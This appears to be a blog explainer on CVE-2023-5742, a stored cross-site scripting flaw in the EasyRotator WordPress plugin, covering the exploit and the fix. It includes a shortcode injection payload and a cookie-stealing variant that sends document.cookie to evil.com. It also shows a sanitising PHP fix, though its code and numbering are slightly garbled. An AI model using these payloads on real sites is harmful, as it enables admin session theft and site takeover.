CVE-2023-5742 - EasyRotator for WordPress Plugin – How Contributor Users Can Inject Malicious Scripts (Exploit & Fix)

If you run a WordPress site using the EasyRotator for WordPress plugin, there’s a serious security hole you need to know about. In this long read, I’ll explain what CVE-2023-5742 is, how it can be exploited, and what you can do to fix it — all in clear, simple language.

What is CVE-2023-5742?

CVE-2023-5742 is a Stored Cross-Site Scripting (XSS) vulnerability found in all versions of EasyRotator for WordPress up to and including 1..14.

In short, it means that anyone with at least a contributor role on your site can inject malicious scripts into pages using the [easyrotator] shortcode. Whenever another user visits a compromised page, these scripts run in their browser.

Why should you care?

- An attacker could steal admin cookies, deface your site, or perform unauthorized actions as the victim.
- These attacks are persistent — meaning the scripts “stick” on your pages until someone removes them.

How Does the Vulnerability Work?

The EasyRotator plugin lets users add image rotators/carousels by placing the [easyrotator] shortcode in posts. The problem? It doesn’t properly sanitize or escape shortcode attributes inside the HTML output.

This means you can “smuggle” JavaScript code into an attribute, which then executes.

Sample Exploit Code Snippet

Suppose you have a WordPress account with contributor access. You go to create a new post and add this shortcode:

[easyrotator align='" onmouseover="alert(\'XSSed\')"']

When the page is rendered, it produces the following, unsafe HTML

<div class="easyrotator" align='" onmouseover="alert('XSSed')"'>
  ...
</div>

When someone moves their mouse over that element, the browser runs the injected alert('XSSed') JavaScript.

Of course, an attacker could use more harmful code, like stealing cookies or redirecting users.

*It’s important to note:*

- The attacker needs at least contributor access. Contributors can submit posts, so they can place the shortcode and scripts on your site.
- Any user (admin, visitor, etc.) who views the post with the malicious shortcode will have the script executed in their browser.

`

This image rotator is so cool! [easyrotator align='" onmouseover="fetch('https://evil.com/stealcookie?c='+document.cookie)"']

A logged-in admin visits the post to approve or edit it.

4. The admin's browser executes the attacker's code—maybe sending the admin's authentication cookie to the attacker's server.

Result: Attacker can steal admin cookies and potentially take over the site.

Plugin Vulnerabilities Database:

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easyrotator-for-wordpress/easyrotator-for-wordpress-1--14-auth-stored-cross-site-scripting

WPScan Advisory:

https://wpscan.com/vulnerability/66396063-41a7-4ea8-bf09-9320786f2d04

1. Immediate Actions

- Update the plugin: Upgrade to the latest version as soon as a patch is available. If there is no patch yet, deactivate or remove EasyRotator until it’s fixed.
- Check your site for suspicious posts or shortcodes, especially from contributor/subscriber users.

Restrict contributor permissions: Only grant contributor access to trusted individuals.

- Sanitize user input: If you develop plugins or shortcodes, always sanitize and escape any user-supplied data.

If you’re maintaining a fork, update the shortcode handler to sanitize attributes

// BAD: previous code
$align = $_GET['align'];
echo '<div class="easyrotator" align="'.$align.'">';

// GOOD: patched code
$align = isset($_GET['align']) ? htmlspecialchars($_GET['align'], ENT_QUOTES, 'UTF-8') : '';
echo '<div class="easyrotator" align="'.$align.'">';

Or better, only allow safe values

$safe_align = in_array($align, ['left','center','right','none']) ? $align : 'none';

Summary

- Every version of EasyRotator for WordPress up to 1..14 is vulnerable to authenticated stored XSS via its shortcode.
- Exploiting this only requires contributor-level permissions—dangerous on multi-user and membership sites!

Stay safe, and always be careful what plugins and users you trust on your WordPress sites!

*If you found this helpful, please share with fellow site admins!*

Further Reading

- Stored XSS explained - OWASP
- EasyRotator plugin at WordPress.org
- WordFence Vulnerability Advisory

Timeline

Published on: 11/22/2023 16:15:14 UTC
Last modified on: 11/27/2023 21:40:48 UTC